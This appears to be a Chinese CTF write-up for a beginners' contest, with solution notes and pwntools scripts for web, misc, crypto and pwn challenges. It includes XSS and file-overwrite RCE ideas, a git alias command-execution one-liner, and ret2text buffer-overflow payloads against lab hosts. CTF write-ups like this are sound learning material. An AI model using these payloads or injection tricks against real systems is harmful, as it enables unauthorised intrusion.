萌新赛 WP 只写写有意思的题吧
web#
babyjvav#
https://www.tritium.work/2023/11/06/JAVA 入门的坑 /
secchat#
这里有一个插入 innerhtml 的 domxss 可以用 svg 标签或者 img 的 onerror 触发
注意到在发起聊天的时候 id 会调用这个 message 函数,就把 xss 构造进 id,发送给 admin,就能通过各种函数调用控制 admin 的行为了
大雪想考五百分#
。。我觉得这个题低能的很
daxue =new Proxy({
"math": "150",
"computer": new String("150"),
"politics": 98,
"english": 100,
"flag": 0,
value:500
}, {
get:function (target, prop, receiver) {
if (prop === 'politics') {
if (target.politics !== 100) {
return target.politics++;
} else {
return target.politics;
}
};
if(prop === "valueOf"){
return function() {
return target.value;
};
};
if (prop === 'english') {
if (target.english !== 100){
return "99";
}else {
return target.english++;
}
};
return Reflect.get(target, prop,receiver);
}
});
我新学的 flask#
利用任意文件上传覆盖 /src/app.py, 添加一个恶意路由,就能 rce 了
misc#
大雪树锯结构#
打 gitshell 的 考察一个很少用的点
git -c alias.test='!/readflag' test
用 alias 引入外部命令
内存取证#
用 vol 查看进程,dump 出 backdoor.exe, 读就行了
3G 之前是什么#
想考信息论,但是在 ctf 环境下肯定有一种歪路
while True:
r = remote("172.20.14.117",53001)
for i in range(15):
print(r.recvuntil(b"Ask Shannon:\n[-] "))
r.sendline(b"1")
r.recvuntil(b"Now open the chests:\n[-] ")
r.sendline(b'1 1 1 1 1 1 1')
res = r.recvline().decode()
if "You've found all the treas" in res:
print(res)
break
else:
print("next")
r.close()
continue
一共只有 128 种情况 一定很快就会出现全 1 的
crypto#
hard_pow#
打长度扩展攻击 hashpumpy 装不明白,用了一个平替
https://github.com/shellfeel/hash-ext-attack/tree/master
easy_pow#
用 brutehash 跑出来就行了 不用脚本
Github Repo not found
The embedded github repo could not be found…
easy_dhke#
什么东西都泄露了 都偷过来缝进 pwntools 里
from Crypto.Util.number import * # type: ignore
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
import string
import random
import os
from pwn import *
# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice
alice = 22751
# bob is Bob's private key, an integer chosen by Bob
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))
def encrypt(plain_text: bytes, key: bytes) -> bytes:
cipher = AES.new(key, AES.MODE_ECB)
cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
return cipher_text
def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
cipher = AES.new(key, AES.MODE_ECB)
plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
return plain_text
r = remote('172.20.14.117',40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa',key))
print(r.recvall())
easy_rsa#
这个题的 n 实在简单,直接去 factordb 分解出来就能解密了
leak_d#
你都知道 d 了 直接解密不就行了
脚本好像被我删了
pwn#
right#
自己研究出来了这个,ctfwiki 上最简单的 ret2text
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
r = remote("172.20.14.117",28202)
addr = 0x40115A
payload = flat([b'a'*0x28,addr])
r.recvuntil(b'so please tell me what you want to tell me\n')
# print(payload)
r.sendline(payload)
# r.sendline(b'ls')
r.interactive()
# print(r.recvline())
addr 是 system 那一行的地址,rbp-20h+8 覆盖到栈顶
onepiece#
from pwn import *
io=remote("172.20.14.117",61768)
addr = 0x40119e
payload=b"a"*0x100+p64(addr)*0x100
io.sendline(payload)
io.interactive()
乱出的 我是看不明白 blindpwn